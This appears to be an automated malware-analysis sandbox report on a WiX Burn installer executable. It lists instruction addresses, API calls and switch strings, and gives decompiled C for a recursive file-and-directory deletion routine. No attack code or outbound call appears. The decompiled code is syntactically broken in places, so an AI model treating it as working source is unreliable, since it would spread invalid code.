                                                                                                                                                                  0x0041069d
                                                                                                                                                                  0x0041069e
                                                                                                                                                                  0x004106ad
                                                                                                                                                                  0x004106b1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004106b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004106b3
                                                                                                                                                                  0x00410638
                                                                                                                                                                  0x00410638
                                                                                                                                                                  0x0041063e
                                                                                                                                                                  0x00410a17
                                                                                                                                                                  0x00410a27
                                                                                                                                                                  0x00410a2c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a2c
                                                                                                                                                                  0x0041064a
                                                                                                                                                                  0x0041064b
                                                                                                                                                                  0x0041065a
                                                                                                                                                                  0x0041065e
                                                                                                                                                                  0x00410a0d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a0d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041065e
                                                                                                                                                                  0x004105ed
                                                                                                                                                                  0x004105f1
                                                                                                                                                                  0x004109f1
                                                                                                                                                                  0x00410a01
                                                                                                                                                                  0x00410a06
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a06
                                                                                                                                                                  0x00410604
                                                                                                                                                                  0x00410608
                                                                                                                                                                  0x004109e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004109e7
                                                                                                                                                                  0x00410611
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410611
                                                                                                                                                                  0x004105ba
                                                                                                                                                                  0x004105be
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004105c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004105c4
                                                                                                                                                                  0x00410561
                                                                                                                                                                  0x00410565
                                                                                                                                                                  0x004109c8
                                                                                                                                                                  0x004109d8
                                                                                                                                                                  0x004109dd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004109dd
                                                                                                                                                                  0x00410578
                                                                                                                                                                  0x0041057c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410582
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410582
                                                                                                                                                                  0x0041052a
                                                                                                                                                                  0x0041052d
                                                                                                                                                                  0x00410531
                                                                                                                                                                  0x00410537
                                                                                                                                                                  0x00410537
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410531
                                                                                                                                                                  0x00410502
                                                                                                                                                                  0x00410504
                                                                                                                                                                  0x00410504
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004104b7
                                                                                                                                                                  0x00410481
                                                                                                                                                                  0x00410484
                                                                                                                                                                  0x00410489
                                                                                                                                                                  0x0041048f
                                                                                                                                                                  0x0041048f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410489
                                                                                                                                                                  0x00410449
                                                                                                                                                                  0x0041044c
                                                                                                                                                                  0x00410451
                                                                                                                                                                  0x00410457
                                                                                                                                                                  0x00410457
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410451
                                                                                                                                                                  0x00410411
                                                                                                                                                                  0x00410414
                                                                                                                                                                  0x00410419
                                                                                                                                                                  0x0041041f
                                                                                                                                                                  0x0041041f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410419
                                                                                                                                                                  0x0041039e
                                                                                                                                                                  0x004103a4
                                                                                                                                                                  0x004103a6
                                                                                                                                                                  0x004103a6
                                                                                                                                                                  0x004103a8
                                                                                                                                                                  0x004103a8
                                                                                                                                                                  0x004103ae
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103b4
                                                                                                                                                                  0x004103b8
                                                                                                                                                                  0x004103bf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103cf
                                                                                                                                                                  0x004103cf
                                                                                                                                                                  0x004103df
                                                                                                                                                                  0x004103e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103e9
                                                                                                                                                                  0x004103bf
                                                                                                                                                                  0x004103ae
                                                                                                                                                                  0x00410371
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410371
                                                                                                                                                                  0x00410343
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410343
                                                                                                                                                                  0x00410315
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102d7
                                                                                                                                                                  0x004102d7
                                                                                                                                                                  0x004102dc
                                                                                                                                                                  0x004102de
                                                                                                                                                                  0x004102df
                                                                                                                                                                  0x004102e5
                                                                                                                                                                  0x004102eb
                                                                                                                                                                  0x004102eb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102e5
                                                                                                                                                                  0x004102d5
                                                                                                                                                                  0x00410249
                                                                                                                                                                  0x004101e0
                                                                                                                                                                  0x0041019a
                                                                                                                                                                  0x0041016b
                                                                                                                                                                  0x004100c3
                                                                                                                                                                  0x004100d6
                                                                                                                                                                  0x004100f6
                                                                                                                                                                  0x004100fa
                                                                                                                                                                  0x00410110
                                                                                                                                                                  0x00410112
                                                                                                                                                                  0x00410117
                                                                                                                                                                  0x0041014e
                                                                                                                                                                  0x00410151
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410119
                                                                                                                                                                  0x00410119
                                                                                                                                                                  0x0041012a
                                                                                                                                                                  0x00410134
                                                                                                                                                                  0x00410142
                                                                                                                                                                  0x00410147
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410147
                                                                                                                                                                  0x004100fc
                                                                                                                                                                  0x004100fc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004100fc
                                                                                                                                                                  0x004100d8
                                                                                                                                                                  0x004100d8
                                                                                                                                                                  0x004100dd
                                                                                                                                                                  0x004100dd
                                                                                                                                                                  0x004100de
                                                                                                                                                                  0x00410b11
                                                                                                                                                                  0x00410b15
                                                                                                                                                                  0x00410b1a
                                                                                                                                                                  0x00410b1a
                                                                                                                                                                  0x00410b25
                                                                                                                                                                  0x00410b25
                                                                                                                                                                  0x004100d6

                                                                                                                                                                  APIs
                                                                                                                                                                  • CommandLineToArgvW.SHELL32(00401F17,00402283,00401F17,00401F17,00000000,00401F17,ignored ,00000000,00401DDF,00000000,00000000,004021A3,004021A7,00401F17,00402283), ref: 0041010A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00410119
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00402241,000000FF,004444A4,000000FF,00401DDF,00000000,00000000,004021A3,004021A7), ref: 00410191
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 004101B4
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,004444E8,000000FF), ref: 004101D7
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,004444EC,000000FF), ref: 004101FA
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 0041021D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,004444FC,000000FF), ref: 00410240
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 00410263
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0044450C,000000FF), ref: 00410286
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 004102A9
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 004102CC
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,norestart,000000FF), ref: 00410307
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,forcerestart,000000FF), ref: 00410335
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,promptrestart,000000FF), ref: 00410363
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 00410391
                                                                                                                                                                  • lstrlenW.KERNEL32(-00000002), ref: 004108ED
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.), ref: 004108FA
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.), ref: 0041090F
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 00410919
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 0041092A
                                                                                                                                                                  • LocalFree.KERNEL32(004021A7,00401DDF,00000000,00000000,004021A3,004021A7,00401F17,00402283,?,?,00000000), ref: 00410B0B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$lstrlen$ArgvCommandErrorFreeLastLineLocal
                                                                                                                                                                  • String ID: -$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy command line.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to get command line.$Failed to initialize command line.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse unelevated connection.$Missing required parameter for switch: %ls$Must specify a path for append log.$Must specify a path for log.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$Must specify the unelevated name, token and parent process id.$burn.$burn.disable.unelevate$burn.elevated$burn.embedded$burn.ignoredependencies$burn.log.append$burn.passthrough$burn.related.addon$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.unelevated$core.cpp$forcerestart$help$ignored $keepaupaused$layout$log$modify$noaupause$norestart$package$parent$parent:none$passive$promptrestart$quiet$repair$silent$uninstall$update
                                                                                                                                                                  • API String ID: 1440157973-4011892239
                                                                                                                                                                  • Opcode ID: 3ca8676b315f28125c47b76bfaefeb6e494bb722c605cb360048f9d97ca11d6e
                                                                                                                                                                  • Instruction ID: f54be766a851fb23ceb8536b9f6bf6779bc39dd5e1cf029d1043179a4b77228e
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca8676b315f28125c47b76bfaefeb6e494bb722c605cb360048f9d97ca11d6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C52E671644204BBEB218F48CC86FAB32A5DB55734F748317F275AA2D1C7F8A9C1CA58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043740C, Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 307fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E0043740C(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, unsigned int _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1078;
				intOrPtr _v1592;
				intOrPtr _v1594;
				struct _WIN32_FIND_DATAW _v1640;
				signed int _v1644;
				WCHAR* _v1648;
				signed short _v1652;
				signed short _v1656;
				signed int _v1660;
				signed short _v1664;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				signed char _t77;
				void* _t78;
				signed char _t91;
				signed short _t93;
				long _t95;
				signed short _t96;
				signed short _t97;
				signed short _t99;
				signed short _t100;
				signed short _t101;
				signed short _t104;
				signed short _t105;
				signed short _t107;
				signed short _t110;
				signed short _t111;
				signed short _t113;
				signed short _t115;
				signed short _t119;
				signed short _t120;
				signed short _t121;
				signed short _t122;
				long _t123;
				WCHAR* _t124;
				signed char _t125;
				WCHAR* _t126;
				void* _t127;
				WCHAR* _t128;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t136;
				signed short _t140;
				signed short _t145;
				signed short _t148;
				signed short _t152;
				signed short _t155;
				signed short _t158;
				signed short _t161;
				signed int _t164;

				_t134 = __edx;
				_t63 =  *0x4560d0; // 0xae480e18
				_v8 = _t63 ^ _t164;
				_v1660 = _v1660 | 0xffffffff;
				_v1656 = _a8 & 0x00000001;
				_t124 = _a4;
				_v1664 = _a8 >> 0x00000001 & 0x00000001;
				_t137 = 0;
				_v1644 = _v1644 & 0;
				_push(0x208);
				_v1652 = _a8 >> 0x00000002 & 0x00000001;
				_push(0);
				_push( &_v1048);
				_v1648 = _t124;
				E004267C0(_t124, __ecx, 0x208, 0, __eflags);
				_push(0x208);
				_push(0);
				_push( &_v528);
				E004267C0(_t124, __ecx, 0x208, 0, __eflags);
				_t77 = GetFileAttributesW(_t124);
				_t136 = GetLastError;
				_t125 = _t77;
				if(_t125 != 0xffffffff) {
					L4:
					__eflags = _t125 & 0x00000010;
					if((_t125 & 0x00000010) == 0) {
						_t137 = 0x8000ffff;
						L51:
						_t78 = _v1660;
						__eflags = _t78 - 0xffffffff;
						if(_t78 != 0xffffffff) {
							FindClose(_t78);
						}
						L53:
						if(_v1644 != 0) {
							E004380AB(_v1644);
						}
						return L004267AF(_t137, _v8 ^ _t164, _t136, _t137);
					}
					__eflags = _t125 & 0x00000001;
					_t126 = _v1648;
					if((_t125 & 0x00000001) == 0) {
						L8:
						__eflags = _v1656;
						if(_v1656 != 0) {
							L10:
							__eflags = _v1652;
							if(_v1652 == 0) {
								L13:
								_t137 = E004314A9(_t126, L"*.*",  &_v1644);
								__eflags = _t137;
								if(_t137 < 0) {
									goto L53;
								}
								_t127 = FindFirstFileW(_v1644,  &_v1640);
								_v1660 = _t127;
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									do {
										_t132 = 0x2e;
										__eflags = _t132 - _v1640.cFileName;
										if(_t132 != _v1640.cFileName) {
											L20:
											_v1078 = 0;
											_t137 = E004314A9(_v1648,  &(_v1640.cFileName),  &_v1644);
											__eflags = _t137;
											if(_t137 < 0) {
												goto L51;
											}
											__eflags = _v1664;
											_t91 = _v1640.dwFileAttributes;
											if(_v1664 == 0) {
												L25:
												__eflags = _v1656;
												if(_v1656 == 0) {
													goto L35;
												}
												__eflags = _t91 & 0x00000007;
												if((_t91 & 0x00000007) == 0) {
													L28:
													_t100 = DeleteFileW(_v1644);
													__eflags = _t100;
													if(_t100 != 0) {
														goto L35;
													}
													__eflags = _v1652 - _t100;
													if(_v1652 == _t100) {
														_t101 = GetLastError();
														__eflags = _t101;
														_t145 =  <=  ? _t101 : _t101 & 0x0000ffff | 0x80070000;
														_t97 = 0x80004005;
														__eflags = _t145;
														_t137 =  >=  ? 0x80004005 : _t145;
														_push( >=  ? 0x80004005 : _t145);
														_push(0x130);
														L45:
														_push("dirutil.cpp");
														E004300D9(_t97);
														goto L51;
													}
													_t104 = GetTempFileNameW( &_v1048, L"DEL", 0,  &_v528);
													__eflags = _t104;
													if(_t104 == 0) {
														_t105 = GetLastError();
														__eflags = _t105;
														_t148 =  <=  ? _t105 : _t105 & 0x0000ffff | 0x80070000;
														_t97 = 0x80004005;
														__eflags = _t148;
														_t137 =  >=  ? 0x80004005 : _t148;
														_push( >=  ? 0x80004005 : _t148);
														_push(0x120);
														goto L45;
													}
													_t107 = MoveFileExW(_v1644,  &_v528, 1);
													_push(4);
													_push(0);
													__eflags = _t107;
													if(_t107 == 0) {
														_push(_v1644);
													} else {
														_push( &_v528);
													}
													MoveFileExW();
													goto L35;
												}
												_t110 = SetFileAttributesW(_v1644, 0x80);
												__eflags = _t110;
												if(_t110 == 0) {
													_t111 = GetLastError();
													__eflags = _t111;
													_t152 =  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
													_t97 = 0x80004005;
													__eflags = _t152;
													_t137 =  >=  ? 0x80004005 : _t152;
													_push( >=  ? 0x80004005 : _t152);
													_push(0x116);
													goto L45;
												}
												goto L28;
											}
											__eflags = _t91 & 0x00000010;
											if((_t91 & 0x00000010) == 0) {
												goto L25;
											}
											_t113 = E0043124A(_t132, _t136,  &_v1644);
											_t137 = _t113;
											__eflags = _t113;
											if(__eflags < 0) {
												goto L51;
											}
											E0043740C(_t132, _t134, __eflags, _v1644, _a8);
											goto L35;
										}
										__eflags = 0 - _v1594;
										if(0 == _v1594) {
											goto L35;
										}
										__eflags = _t132 - _v1594;
										if(_t132 != _v1594) {
											goto L20;
										}
										__eflags = 0 - _v1592;
										if(0 == _v1592) {
											goto L35;
										}
										goto L20;
										L35:
										_t93 = FindNextFileW(_t127,  &_v1640);
										__eflags = _t93;
									} while (_t93 != 0);
									_t95 = GetLastError();
									__eflags = _t95 - 0x12;
									if(_t95 != 0x12) {
										_t96 = GetLastError();
										__eflags = _t96;
										_t140 =  <=  ? _t96 : _t96 & 0x0000ffff | 0x80070000;
										_t97 = 0x80004005;
										__eflags = _t140;
										_t137 =  >=  ? 0x80004005 : _t140;
										_push( >=  ? 0x80004005 : _t140);
										_push(0x13d);
										goto L45;
									}
									_t137 = 0;
									__eflags = 0;
									L38:
									_t128 = _v1648;
									_t99 = RemoveDirectoryW(_t128);
									__eflags = _t99;
									if(_t99 != 0) {
										goto L51;
									}
									_t97 = GetLastError();
									__eflags = _t97;
									_t137 =  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000;
									__eflags = _t137 - 0x80070020;
									if(_t137 != 0x80070020) {
										L43:
										__eflags = _t137;
										if(_t137 >= 0) {
											goto L51;
										}
										L44:
										_push(_t137);
										_push(0x14c);
										goto L45;
									}
									__eflags = _v1652;
									if(_v1652 == 0) {
										goto L44;
									}
									_t97 = MoveFileExW(_t128, 0, 4);
									__eflags = _t97;
									if(_t97 == 0) {
										goto L44;
									}
									_t137 = 0;
									__eflags = 0;
									goto L43;
								}
								_t115 = GetLastError();
								__eflags = _t115;
								_t155 =  <=  ? _t115 : _t115 & 0x0000ffff | 0x80070000;
								_t116 = 0x80004005;
								__eflags = _t155;
								_t137 =  >=  ? 0x80004005 : _t155;
								_push( >=  ? 0x80004005 : _t155);
								_push(0xf2);
								L3:
								_push("dirutil.cpp");
								E004300D9(_t116);
								goto L53;
							}
							_t119 = GetTempPathW(0x104,  &_v1048);
							__eflags = _t119;
							if(_t119 != 0) {
								goto L13;
							}
							_t120 = GetLastError();
							__eflags = _t120;
							_t158 =  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000;
							_t116 = 0x80004005;
							__eflags = _t158;
							_t137 =  >=  ? 0x80004005 : _t158;
							_push( >=  ? 0x80004005 : _t158);
							_push(0xe7);
							goto L3;
						}
						__eflags = _v1664;
						if(_v1664 == 0) {
							goto L38;
						}
						goto L10;
					}
					_t121 = SetFileAttributesW(_t126, 0x80);
					__eflags = _t121;
					if(_t121 != 0) {
						goto L8;
					}
					_t122 = GetLastError();
					__eflags = _t122;
					_t161 =  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000;
					_t116 = 0x80004005;
					__eflags = _t161;
					_t137 =  >=  ? 0x80004005 : _t161;
					_push( >=  ? 0x80004005 : _t161);
					_push(0xdc);
					goto L3;
				}
				_t123 = GetLastError();
				_t133 = 3;
				_t116 =  ==  ? _t133 : _t123;
				_t137 =  <=  ?  ==  ? _t133 : _t123 : ( ==  ? _t133 : _t123) & 0x0000ffff | 0x80070000;
				if(_t137 >= 0) {
					goto L4;
				}
				_push(_t137);
				_push(0xd3);
				goto L3;
			}



























































                                                                                                                                                                  0x0043740c
                                                                                                                                                                  0x00437415
                                                                                                                                                                  0x0043741c
                                                                                                                                                                  0x00437422
                                                                                                                                                                  0x0043742c
                                                                                                                                                                  0x0043743b
                                                                                                                                                                  0x0043743e
                                                                                                                                                                  0x00437454
                                                                                                                                                                  0x00437456
                                                                                                                                                                  0x0043745c
                                                                                                                                                                  0x0043745d
                                                                                                                                                                  0x00437469
                                                                                                                                                                  0x0043746a
                                                                                                                                                                  0x0043746b
                                                                                                                                                                  0x00437471
                                                                                                                                                                  0x00437476
                                                                                                                                                                  0x0043747d
                                                                                                                                                                  0x0043747e
                                                                                                                                                                  0x0043747f
                                                                                                                                                                  0x00437488
                                                                                                                                                                  0x0043748e
                                                                                                                                                                  0x00437494
                                                                                                                                                                  0x00437499
                                                                                                                                                                  0x004374cd
                                                                                                                                                                  0x004374cd
                                                                                                                                                                  0x004374d0
                                                                                                                                                                  0x00437812
                                                                                                                                                                  0x00437817
                                                                                                                                                                  0x00437817
                                                                                                                                                                  0x0043781d
                                                                                                                                                                  0x00437820
                                                                                                                                                                  0x00437823
                                                                                                                                                                  0x00437823
                                                                                                                                                                  0x00437829
                                                                                                                                                                  0x00437830
                                                                                                                                                                  0x00437838
                                                                                                                                                                  0x00437838
                                                                                                                                                                  0x0043784d
                                                                                                                                                                  0x0043784d
                                                                                                                                                                  0x004374d6
                                                                                                                                                                  0x004374d9
                                                                                                                                                                  0x004374df
                                                                                                                                                                  0x00437513
                                                                                                                                                                  0x00437513
                                                                                                                                                                  0x0043751a
                                                                                                                                                                  0x00437529
                                                                                                                                                                  0x00437529
                                                                                                                                                                  0x00437530
                                                                                                                                                                  0x0043756d
                                                                                                                                                                  0x0043757f
                                                                                                                                                                  0x00437581
                                                                                                                                                                  0x00437583
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043759c
                                                                                                                                                                  0x0043759e
                                                                                                                                                                  0x004375a4
                                                                                                                                                                  0x004375a7
                                                                                                                                                                  0x004375ce
                                                                                                                                                                  0x004375d0
                                                                                                                                                                  0x004375d1
                                                                                                                                                                  0x004375d8
                                                                                                                                                                  0x004375ff
                                                                                                                                                                  0x00437601
                                                                                                                                                                  0x00437621
                                                                                                                                                                  0x00437623
                                                                                                                                                                  0x00437625
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043762b
                                                                                                                                                                  0x00437632
                                                                                                                                                                  0x00437638
                                                                                                                                                                  0x00437667
                                                                                                                                                                  0x00437667
                                                                                                                                                                  0x0043766e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437674
                                                                                                                                                                  0x00437676
                                                                                                                                                                  0x00437691
                                                                                                                                                                  0x00437697
                                                                                                                                                                  0x0043769d
                                                                                                                                                                  0x0043769f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004376a1
                                                                                                                                                                  0x004376a7
                                                                                                                                                                  0x004377cb
                                                                                                                                                                  0x004377d6
                                                                                                                                                                  0x004377d8
                                                                                                                                                                  0x004377db
                                                                                                                                                                  0x004377e0
                                                                                                                                                                  0x004377e2
                                                                                                                                                                  0x004377e5
                                                                                                                                                                  0x004377e6
                                                                                                                                                                  0x00437778
                                                                                                                                                                  0x00437778
                                                                                                                                                                  0x0043777d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043777d
                                                                                                                                                                  0x004376c2
                                                                                                                                                                  0x004376c8
                                                                                                                                                                  0x004376ca
                                                                                                                                                                  0x004377a9
                                                                                                                                                                  0x004377b4
                                                                                                                                                                  0x004377b6
                                                                                                                                                                  0x004377b9
                                                                                                                                                                  0x004377be
                                                                                                                                                                  0x004377c0
                                                                                                                                                                  0x004377c3
                                                                                                                                                                  0x004377c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004377c4
                                                                                                                                                                  0x004376e5
                                                                                                                                                                  0x004376e7
                                                                                                                                                                  0x004376e9
                                                                                                                                                                  0x004376eb
                                                                                                                                                                  0x004376ed
                                                                                                                                                                  0x004376f8
                                                                                                                                                                  0x004376ef
                                                                                                                                                                  0x004376f5
                                                                                                                                                                  0x004376f5
                                                                                                                                                                  0x004376fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004376fe
                                                                                                                                                                  0x00437683
                                                                                                                                                                  0x00437689
                                                                                                                                                                  0x0043768b
                                                                                                                                                                  0x00437787
                                                                                                                                                                  0x00437792
                                                                                                                                                                  0x00437794
                                                                                                                                                                  0x00437797
                                                                                                                                                                  0x0043779c
                                                                                                                                                                  0x0043779e
                                                                                                                                                                  0x004377a1
                                                                                                                                                                  0x004377a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004377a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043768b
                                                                                                                                                                  0x0043763a
                                                                                                                                                                  0x0043763c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437645
                                                                                                                                                                  0x0043764a
                                                                                                                                                                  0x0043764c
                                                                                                                                                                  0x0043764e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043765d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043765d
                                                                                                                                                                  0x004375dc
                                                                                                                                                                  0x004375e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004375e9
                                                                                                                                                                  0x004375f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004375f2
                                                                                                                                                                  0x004375f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437700
                                                                                                                                                                  0x00437708
                                                                                                                                                                  0x0043770e
                                                                                                                                                                  0x0043770e
                                                                                                                                                                  0x00437716
                                                                                                                                                                  0x00437718
                                                                                                                                                                  0x0043771b
                                                                                                                                                                  0x004377ed
                                                                                                                                                                  0x004377f8
                                                                                                                                                                  0x004377fa
                                                                                                                                                                  0x004377fd
                                                                                                                                                                  0x00437802
                                                                                                                                                                  0x00437804
                                                                                                                                                                  0x00437807
                                                                                                                                                                  0x00437808
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437808
                                                                                                                                                                  0x00437721
                                                                                                                                                                  0x00437721
                                                                                                                                                                  0x00437723
                                                                                                                                                                  0x00437723
                                                                                                                                                                  0x0043772a
                                                                                                                                                                  0x00437730
                                                                                                                                                                  0x00437732
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437738
                                                                                                                                                                  0x00437743
                                                                                                                                                                  0x00437745
                                                                                                                                                                  0x00437748
                                                                                                                                                                  0x0043774e
                                                                                                                                                                  0x0043776a
                                                                                                                                                                  0x0043776a
                                                                                                                                                                  0x0043776c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437772
                                                                                                                                                                  0x00437772
                                                                                                                                                                  0x00437773
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437773
                                                                                                                                                                  0x00437750
                                                                                                                                                                  0x00437757
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043775e
                                                                                                                                                                  0x00437764
                                                                                                                                                                  0x00437766
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437768
                                                                                                                                                                  0x00437768
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437768
                                                                                                                                                                  0x004375a9
                                                                                                                                                                  0x004375b4
                                                                                                                                                                  0x004375b6
                                                                                                                                                                  0x004375b9
                                                                                                                                                                  0x004375be
                                                                                                                                                                  0x004375c0
                                                                                                                                                                  0x004375c3
                                                                                                                                                                  0x004375c4
                                                                                                                                                                  0x004374be
                                                                                                                                                                  0x004374be
                                                                                                                                                                  0x004374c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004374c3
                                                                                                                                                                  0x0043753e
                                                                                                                                                                  0x00437544
                                                                                                                                                                  0x00437546
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437548
                                                                                                                                                                  0x00437553
                                                                                                                                                                  0x00437555
                                                                                                                                                                  0x00437558
                                                                                                                                                                  0x0043755d
                                                                                                                                                                  0x0043755f
                                                                                                                                                                  0x00437562
                                                                                                                                                                  0x00437563
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437563
                                                                                                                                                                  0x0043751c
                                                                                                                                                                  0x00437523
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437523
                                                                                                                                                                  0x004374e7
                                                                                                                                                                  0x004374ed
                                                                                                                                                                  0x004374ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004374f1
                                                                                                                                                                  0x004374fc
                                                                                                                                                                  0x004374fe
                                                                                                                                                                  0x00437501
                                                                                                                                                                  0x00437506
                                                                                                                                                                  0x00437508
                                                                                                                                                                  0x0043750b
                                                                                                                                                                  0x0043750c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043750c
                                                                                                                                                                  0x0043749b
                                                                                                                                                                  0x004374a2
                                                                                                                                                                  0x004374a3
                                                                                                                                                                  0x004374b1
                                                                                                                                                                  0x004374b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004374b8
                                                                                                                                                                  0x004374b9
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
